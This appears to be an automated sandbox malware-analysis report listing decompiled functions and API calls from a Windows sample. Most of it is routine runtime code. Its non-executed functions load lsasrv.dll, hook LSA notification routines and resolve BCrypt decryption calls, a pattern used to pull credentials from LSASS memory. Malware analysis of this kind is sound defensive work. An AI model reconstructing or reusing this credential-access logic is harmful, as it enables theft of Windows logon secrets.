    0x00f64dff
    0x00f64e08
    0x00f64e1f
    0x00f64e1f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f64df0
    0x00f64df0
    0x00f64df0
    0x00f64df4
    0x00f64df6
    0x00f64df6
    0x00f64df8
    0x00f64dfb
    0x00000000
    0x00f64df0
    0x00f64e28

    APIs
      • Part of subcall function 00F670CE: EncodePointer.KERNEL32(00F67C5A,?,?,00F64DBE), ref: 00F670DA
    • __initterm_e.LIBCMT ref: 00F64DC8
      • Part of subcall function 00F67190: __FindPESection.LIBCMT ref: 00F671EB
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F6704A, Relevance: 1.5, APIs: 1, Instructions: 22
    C-Code - Quality: 37%
    			E00F6704A() {
				signed int* _t1;
				void* _t3;
				signed int* _t6;

				_t1 = E00F661C9(0x20, 4);
				_t6 = _t1;
				__imp__EncodePointer(_t6);
				 *0xf6cea8 = _t1;
				 *0xf6cea4 = _t1;
				if(_t6 != 0) {
					 *_t6 =  *_t6 & 0x00000000;
					return 0;
				} else {
					_t3 = 0x18;
					return _t3;
				}
			}






    0x00f67051
    0x00f67058
    0x00f6705b
    0x00f67061
    0x00f67066
    0x00f6706d
    0x00f67074
    0x00f6707a
    0x00f6706f
    0x00f67071
    0x00f67073
    0x00f67073

    APIs
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • EncodePointer.KERNEL32(00000000), ref: 00F6705B
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F670CE, Relevance: 1.5, APIs: 1, Instructions: 13
    APIs
    • EncodePointer.KERNEL32(00F67C5A,?,?,00F64DBE), ref: 00F670DA
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F658F2, Relevance: 1.5, APIs: 1, Instructions: 10
    C-Code - Quality: 100%
    			E00F658F2() {
				void* _t3;

				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0xf6c86c = _t3;
				return 0 | _t3 != 0x00000000;
			}




    0x00f658fb
    0x00f65908
    0x00f6590f

    APIs
    • HeapCreate.KERNEL32(00000000,00001000,00000000,00F63A7A,00F69DC8,00000014), ref: 00F658FB
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F64D11, Relevance: 1.5, APIs: 1, Instructions: 8
    C-Code - Quality: 100%
    			E00F64D11(int _a4) {

				E00F64CE6(_a4);
				ExitProcess(_a4);
			}



    0x00f64d19
    0x00f64d22

    APIs
      • Part of subcall function 00F64CE6: GetModuleHandleW.KERNEL32(mscoree.dll,?,00F64D1E,00000000,?,00F6780B,000000FF,0000001E,00000001,00000000,00000000,?,00F66195,00000000,00000001,00000000), ref: 00F64CF0
      • Part of subcall function 00F64CE6: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00F64D1E,00000000,?,00F6780B,000000FF,0000001E,00000001,00000000,00000000,?,00F66195,00000000,00000001), ref: 00F64D00
    • ExitProcess.KERNEL32 ref: 00F64D22
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F66D29, Relevance: 1.5, APIs: 1, Instructions: 4
    APIs
    • EncodePointer.KERNEL32(Function_00006CF0,00F64D69,00000000,00000000,00000000,00000000,00000000,00000000,0000A4A8,00F64957,?,00F63A8B,00F69DC8,00000014), ref: 00F66D2E
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F64593, Relevance: 1.5, APIs: 1, Instructions: 3
    APIs
    • EncodePointer.KERNEL32(00000000,00F67272,00F6C038,00000314,00000000,?,?,?,?,?,00F65134,00F6C038,Microsoft Visual C++ Runtime Library,00012010), ref: 00F64595
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F679A2, Relevance: 1.3, APIs: 1, Instructions: 52
    C-Code - Quality: 86%
    			E00F679A2(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = HeapAlloc( *0xf6c86c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0xf6cd2c;
					if( *0xf6cd2c == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00F66F6C(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00F64C83(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










    0x00f679a7
    0x00f679ac
    0x00f679c9
    0x00f679ce
    0x00f679d0
    0x00f679d2
    0x00f679d4
    0x00f679d4
    0x00f679d4
    0x00000000
    0x00f679dc
    0x00f679e5
    0x00f679eb
    0x00f679ed
    0x00000000
    0x00000000
    0x00f67a21
    0x00f67a23
    0x00000000
    0x00f679ef
    0x00f679ef
    0x00f679f6
    0x00f67a14
    0x00f67a17
    0x00f67a19
    0x00f67a1b
    0x00f67a1b
    0x00f679f8
    0x00f679f9
    0x00f679ff
    0x00f67a01
    0x00f679d5
    0x00f679d5
    0x00f679d7
    0x00f679da
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f67a03
    0x00f67a03
    0x00f67a06
    0x00f67a08
    0x00f67a0a
    0x00f67a0a
    0x00f67a10
    0x00f67a10
    0x00f67a01
    0x00000000
    0x00f679ae
    0x00f679b2
    0x00f679b5
    0x00f679b8
    0x00000000
    0x00f679ba
    0x00f679bf
    0x00f679c8
    0x00f679c8
    0x00f679b8
    0x00000000

    APIs
    • HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00F661DF,?,00000000,00000000,00000000,00000000,?,00F646F5,00000001,00000214), ref: 00F679E5
      • Part of subcall function 00F66F6C: DecodePointer.KERNEL32(?,00F679FE,00000000,00000000,?,00F661DF,?,00000000,00000000,00000000,00000000,?,00F646F5,00000001,00000214), ref: 00F66F77
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F661C9, Relevance: 1.3, APIs: 1, Instructions: 30
    C-Code - Quality: 100%
    			E00F661C9(signed int _a4, signed int _a8) {
				void* _t4;
				long _t6;
				void* _t7;
				long _t8;
				void* _t9;
				void* _t12;
				void* _t13;

				_t8 = 0;
				while(1) {
					_t4 = E00F679A2(_a4, _a8, 0); // executed
					_t7 = _t4;
					_t9 = _t9 + 0xc;
					if(_t7 != 0) {
						break;
					}
					_t12 =  *0xf6c9c0 - _t4; // 0x0
					if(_t12 > 0) {
						Sleep(_t8);
						_t3 = _t8 + 0x3e8; // 0x3e8
						_t6 = _t3;
						_t13 = _t6 -  *0xf6c9c0; // 0x0
						if(_t13 > 0) {
							_t6 = _t6 | 0xffffffff;
						}
						_t8 = _t6;
						if(_t6 != 0xffffffff) {
							continue;
						}
					}
					break;
				}
				return _t7;
			}










    0x00f661d0
    0x00f661d2
    0x00f661da
    0x00f661df
    0x00f661e1
    0x00f661e6
    0x00000000
    0x00000000
    0x00f661e8
    0x00f661ee
    0x00f661f1
    0x00f661f7
    0x00f661f7
    0x00f661fd
    0x00f66203
    0x00f66205
    0x00f66205
    0x00f66208
    0x00f6620d
    0x00000000
    0x00000000
    0x00f6620d
    0x00000000
    0x00f661ee
    0x00f66214

    APIs
      • Part of subcall function 00F679A2: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00F661DF,?,00000000,00000000,00000000,00000000,?,00F646F5,00000001,00000214), ref: 00F679E5
    • Sleep.KERNEL32(00000000), ref: 00F661F1
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61CFA, Relevance: 1.3, APIs: 1, Instructions: 21
    C-Code - Quality: 84%
    			E00F61CFA(void** __esi) {
				void* _v8;
				void* _t9;
				void* _t10;

				_push(_t12);
				_t9 = E00F61DF3(__esi,  &_v8); // executed
				if(_t9 == 0) {
					 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
					return _t9;
				} else {
					_t10 = _v8;
					 *(__esi + 0xc) =  *(_t10 + 8);
					return LocalFree(_t10);
				}
			}






    0x00f61cfe
    0x00f61d05
    0x00f61d0d
    0x00f61d21
    0x00f61d26
    0x00f61d0f
    0x00f61d0f
    0x00f61d16
    0x00f61d20
    0x00f61d20

    APIs
      • Part of subcall function 00F61DF3: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018,?,?,00000000), ref: 00F61E63
      • Part of subcall function 00F61DF3: GetProcAddress.KERNEL32(00000000), ref: 00F61E6C
      • Part of subcall function 00F61DF3: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000109), ref: 00F61EB0
      • Part of subcall function 00F61DF3: GetProcAddress.KERNEL32(00000000), ref: 00F61EB3
      • Part of subcall function 00F61DF3: LocalFree.KERNEL32(?), ref: 00F61EEB
      • Part of subcall function 00F61DF3: LocalFree.KERNEL32(?), ref: 00F61EF0
    • LocalFree.KERNEL32(?,?,?,?,00F61CD3), ref: 00F61D19
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd

    Non-executed Functions

    Function 00F62566, Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 74
    C-Code - Quality: 97%
    			E00F62566() {
				intOrPtr _t1;
				struct HINSTANCE__* _t5;
				intOrPtr _t18;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;

				_t18 =  *0xf6bd14; // 0x0
				if(_t18 >= 0) {
					L14:
					_t1 =  *0xf6bd14; // 0x0
					return _t1;
				}
				_t19 =  *0xf6cd44; // 0x74e70000
				if(_t19 != 0) {
					L4:
					_t22 =  *0xf6cd48; // 0x74e72c72
					if(_t22 != 0) {
						_t23 =  *0xf6cd4c; // 0x74e720d4
						if(_t23 != 0) {
							_t24 =  *0xf6cd50; // 0x74e71ca7
							if(_t24 != 0) {
								_t25 =  *0xf6cd54; // 0x74e71fbc
								if(_t25 != 0) {
									_t26 =  *0xf6cd58; // 0x74e7195c
									if(_t26 != 0) {
										_t27 =  *0xf6cd5c; // 0x74e718b8
										if(_t27 != 0) {
											_t28 =  *0xf6cd60; // 0x74e71f40
											if(_t28 != 0) {
												_t29 =  *0xf6cd64; // 0x74e72391
												if(_t29 != 0) {
													 *0xf6bd14 = E00F626BA();
												}
											}
										}
									}
								}
							}
						}
					}
					L13:
					goto L14;
				}
				_push(L"bcrypt");
				_t5 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LoadLibraryW"))();
				 *0xf6cd44 = _t5;
				if(_t5 == 0) {
					goto L13;
				}
				 *0xf6cd48 = GetProcAddress(_t5, "BCryptOpenAlgorithmProvider");
				 *0xf6cd4c = GetProcAddress( *0xf6cd44, "BCryptSetProperty");
				 *0xf6cd50 = GetProcAddress( *0xf6cd44, "BCryptGetProperty");
				 *0xf6cd54 = GetProcAddress( *0xf6cd44, "BCryptGenerateSymmetricKey");
				 *0xf6cd58 = GetProcAddress( *0xf6cd44, "BCryptEncrypt");
				 *0xf6cd5c = GetProcAddress( *0xf6cd44, "BCryptDecrypt");
				 *0xf6cd60 = GetProcAddress( *0xf6cd44, "BCryptDestroyKey");
				 *0xf6cd64 = GetProcAddress( *0xf6cd44, "BCryptCloseAlgorithmProvider");
				_t21 =  *0xf6cd44; // 0x74e70000
				if(_t21 == 0) {
					goto L13;
				}
				goto L4;
			}
















    0x00f62569
    0x00f6256f
    0x00f6268d
    0x00f6268d
    0x00f62693
    0x00f62693
    0x00f62576
    0x00f6257c
    0x00f62642
    0x00f62642
    0x00f62648
    0x00f6264a
    0x00f62650
    0x00f62652
    0x00f62658
    0x00f6265a
    0x00f62660
    0x00f62662
    0x00f62668
    0x00f6266a
    0x00f62670
    0x00f62672
    0x00f62678
    0x00f6267a
    0x00f62680
    0x00f62687
    0x00f62687
    0x00f62680
    0x00f62678
    0x00f62670
    0x00f62668
    0x00f62660
    0x00f62658
    0x00f62650
    0x00f6268c
    0x00000000
    0x00f6268c
    0x00f62582
    0x00f625a0
    0x00f625a2
    0x00f625a9
    0x00000000
    0x00000000
    0x00f625c2
    0x00f625d4
    0x00f625e6
    0x00f625f8
    0x00f6260a
    0x00f6261c
    0x00f6262e
    0x00f62635
    0x00f6263a
    0x00f62640
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LoadLibraryW,bcrypt), ref: 00F62591
    • GetProcAddress.KERNEL32(00000000), ref: 00F6259E
    • GetProcAddress.KERNEL32(00000000,BCryptOpenAlgorithmProvider), ref: 00F625B5
    • GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00F625C7
    • GetProcAddress.KERNEL32(BCryptGetProperty), ref: 00F625D9
    • GetProcAddress.KERNEL32(BCryptGenerateSymmetricKey), ref: 00F625EB
    • GetProcAddress.KERNEL32(BCryptEncrypt), ref: 00F625FD
    • GetProcAddress.KERNEL32(BCryptDecrypt), ref: 00F6260F
    • GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 00F62621
    • GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 00F62633
      • Part of subcall function 00F626BA: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,?,?,?,00F62687), ref: 00F62741
      • Part of subcall function 00F626BA: GetProcAddress.KERNEL32(00000000,?,?,?,?,00F62687), ref: 00F6274A
      • Part of subcall function 00F626BA: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,?,?,?,00F62687), ref: 00F627C0
      • Part of subcall function 00F626BA: GetProcAddress.KERNEL32(00000000,?,?,?,?,00F62687), ref: 00F627C3
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    Function 00F62143, Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 178
    C-Code - Quality: 89%
    			E00F62143(void* __ecx) {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				void* _v60;
				char _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				signed int _t55;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr _t72;
				intOrPtr _t75;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				void* _t80;
				intOrPtr _t81;
				struct HINSTANCE__* _t85;
				void* _t89;
				WCHAR* _t90;
				intOrPtr _t98;
				intOrPtr* _t100;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr _t117;
				signed int _t122;
				void* _t124;
				signed int _t126;
				struct HINSTANCE__* _t127;
				intOrPtr _t133;
				intOrPtr _t137;

				_t124 = (_t122 & 0xfffffff8) - 0x4c;
				_v76 =  &_v68;
				_v72 = 0xf6cd30;
				_v80 = 7;
				_t126 =  *0xf6bfb4; // 0xc0000225
				if(_t126 >= 0) {
					L25:
					_t55 =  *0xf6bfb4; // 0xc0000225
					return _t55;
				}
				_t127 =  *0xf6cd38; // 0x0
				if(_t127 != 0) {
					L3:
					_v52 =  &_v60;
					_v48 =  &_v24;
					_v44 = 0;
					RtlInitUnicodeString( &_v60, L"lsasrv.dll");
					if(E00F619EE(0xf6cd30, E00F61D27,  &_v60) < 0 || _v52 == 0) {
						goto L25;
					} else {
						_v48 = _v32;
						_v44 = _v28;
						_v40 = _v24;
						if( *0xf6cfd4 < 0xece || _v20 >= 0x45d70a62) {
							_t89 = 0;
						} else {
							_t89 = 1;
						}
						_t133 =  *0xf6cd40; // 0x0
						if(_t133 != 0) {
							L15:
							_v84 = 0xf6bf80;
							if(_t89 != 0) {
								_v84 = 0xf6bf98;
								_v88 = 0xb;
							}
							_push(0);
							if(E00F6134E( &_v84, _v88,  &_v48) != 0) {
								_t68 = _v36;
								_t98 =  *((intOrPtr*)(7 + (0 | _t89 != 0x00000000) * 4 + _t68));
								 *0xf6cf08 = _t98;
								_t117 =  *((intOrPtr*)(0x16 + (0 | _t89 != 0x00000000) * 8 + _t68));
								 *0xf6cf0c = _t117;
								 *0xf6cf04 =  *((intOrPtr*)(0x1c + (0 | _t89 != 0x00000000) * 8 + _t68));
								_t69 =  *((intOrPtr*)(0x27 + (0 | _t89 != 0x00000000) * 8 + _t68));
								 *0xf6cf00 = _t69;
								if(_t98 != 0 && _t117 != 0 &&  *0xf6cf04 != 0 && _t69 != 0) {
									_push(0x100);
									_push(0x40);
									_t90 = L"kernel32";
									 *_t69 = 0x100;
									_t72 =  *(GetProcAddress(GetModuleHandleW(_t90), "LocalAlloc"))();
									_t100 =  *0xf6cf0c; // 0x0
									_push(0x90);
									_push(0x40);
									 *_t100 = _t72;
									_t75 =  *(GetProcAddress(GetModuleHandleW(_t90), "LocalAlloc"))();
									_t101 =  *0xf6cf04; // 0x0
									 *_t101 = _t75;
									_t102 =  *0xf6cf0c; // 0x0
									if( *_t102 != 0 && _t75 != 0) {
										 *0xf6bfb4 =  *0xf6bfb4 & 0x00000000;
									}
								}
							}
							goto L25;
						} else {
							_t76 = GetProcAddress( *0xf6cd38, "LsaICancelNotification");
							_v72 = _t76;
							if(_t76 != 0) {
								_t77 = GetProcAddress( *0xf6cd38, "LsaIRegisterNotification");
								_v76 = _t77;
								if(_t77 != 0) {
									_push(0);
									_t80 = E00F6134E( &_v84, 8,  &_v48);
									_t124 = _t124 + 0x10;
									if(_t80 != 0) {
										_t81 = _v36;
										 *0xf6cd3c =  *((intOrPtr*)(_t81 + 0x6c));
										 *0xf6cd40 =  *((intOrPtr*)(_t81 + 0x70));
									}
								}
							}
							_t137 =  *0xf6cd40; // 0x0
							if(_t137 == 0) {
								goto L25;
							}
							goto L15;
						}
					}
				}
				_push(L"lsasrv");
				_t85 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LoadLibraryW"))();
				 *0xf6cd38 = _t85;
				if(_t85 == 0) {
					goto L25;
				}
				goto L3;
			}










































    0x00f62149
    0x00f6215a
    0x00f6215e
    0x00f62162
    0x00f6216a
    0x00f62170
    0x00f623a0
    0x00f623a0
    0x00f623ab
    0x00f623ab
    0x00f6217c
    0x00f62182
    0x00f621ab
    0x00f621af
    0x00f621b7
    0x00f621c5
    0x00f621c9
    0x00f621e4
    0x00000000
    0x00f621f4
    0x00f62202
    0x00f6220a
    0x00f62212
    0x00f62216
    0x00f62227
    0x00f62222
    0x00f62224
    0x00f62224
    0x00f62229
    0x00f6222f
    0x00f62295
    0x00f62295
    0x00f6229f
    0x00f622a1
    0x00f622a9
    0x00f622a9
    0x00f622b1
    0x00f622ca
    0x00f622d0
    0x00f622e9
    0x00f622ec
    0x00f622f9
    0x00f62303
    0x00f62313
    0x00f62327
    0x00f6232a
    0x00f62331
    0x00f6234f
    0x00f62350
    0x00f62357
    0x00f6235d
    0x00f62364
    0x00f62366
    0x00f6236c
    0x00f62371
    0x00f62379
    0x00f62380
    0x00f62382
    0x00f62388
    0x00f6238a
    0x00f62393
    0x00f62399
    0x00f62399
    0x00f62393
    0x00f62331
    0x00000000
    0x00f62231
    0x00f6223c
    0x00f6223e
    0x00f62244
    0x00f62251
    0x00f62253
    0x00f62259
    0x00f6225b
    0x00f62268
    0x00f6226d
    0x00f62272
    0x00f62274
    0x00f6227b
    0x00f62284
    0x00f62284
    0x00f62272
    0x00f62259
    0x00f62289
    0x00f6228f
    0x00000000
    0x00000000
    0x00000000
    0x00f6228f
    0x00f6222f
    0x00f621e4
    0x00f62184
    0x00f6219c
    0x00f6219e
    0x00f621a5
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LoadLibraryW,lsasrv), ref: 00F62193
    • GetProcAddress.KERNEL32(00000000), ref: 00F6219A
    • RtlInitUnicodeString.NTDLL(?,lsasrv.dll), ref: 00F621C9
      • Part of subcall function 00F619EE: RtlInitUnicodeString.NTDLL(?,00000000), ref: 00F61AC6
      • Part of subcall function 00F619EE: LocalFree.KERNEL32(00000000), ref: 00F61ADE
      • Part of subcall function 00F619EE: _wcsrchr.LIBCMT ref: 00F61B4E
      • Part of subcall function 00F619EE: RtlInitUnicodeString.NTDLL(?,-00000002), ref: 00F61B5D
      • Part of subcall function 00F619EE: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61C39
      • Part of subcall function 00F619EE: GetProcAddress.KERNEL32(00000000), ref: 00F61C40
      • Part of subcall function 00F619EE: LocalFree.KERNEL32(?), ref: 00F61C88
    • GetProcAddress.KERNEL32(LsaICancelNotification), ref: 00F6223C
    • GetProcAddress.KERNEL32(LsaIRegisterNotification), ref: 00F62251
      • Part of subcall function 00F6134E: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F613FB
      • Part of subcall function 00F6134E: GetProcAddress.KERNEL32(00000000), ref: 00F61402
      • Part of subcall function 00F6134E: LocalFree.KERNEL32(?), ref: 00F6144F
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000100), ref: 00F6235F
    • GetProcAddress.KERNEL32(00000000), ref: 00F62362
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000090), ref: 00F6237B
    • GetProcAddress.KERNEL32(00000000), ref: 00F6237E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    Function 00F6724C, Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134
    APIs
      • Part of subcall function 00F64593: EncodePointer.KERNEL32(00000000,00F67272,00F6C038,00000314,00000000,?,?,?,?,?,00F65134,00F6C038,Microsoft Visual C++ Runtime Library,00012010), ref: 00F64595
    • LoadLibraryW.KERNEL32(USER32.DLL,00F6C038,00000314,00000000), ref: 00F67287
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 00F672A3
    • EncodePointer.KERNEL32(00000000), ref: 00F672B4
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00F672C1
    • EncodePointer.KERNEL32(00000000), ref: 00F672C4
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00F672D1
    • EncodePointer.KERNEL32(00000000), ref: 00F672D4
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00F672E1
    • EncodePointer.KERNEL32(00000000), ref: 00F672E4
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00F672F5
    • EncodePointer.KERNEL32(00000000), ref: 00F672F8
    • DecodePointer.KERNEL32(00000000,00F6C038,00000314,00000000), ref: 00F6731A
    • DecodePointer.KERNEL32 ref: 00F67324
    • DecodePointer.KERNEL32(?,00F6C038,00000314,00000000), ref: 00F67363
    • DecodePointer.KERNEL32(?), ref: 00F6737D
    • DecodePointer.KERNEL32(00F6C038,00000314,00000000), ref: 00F67391
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
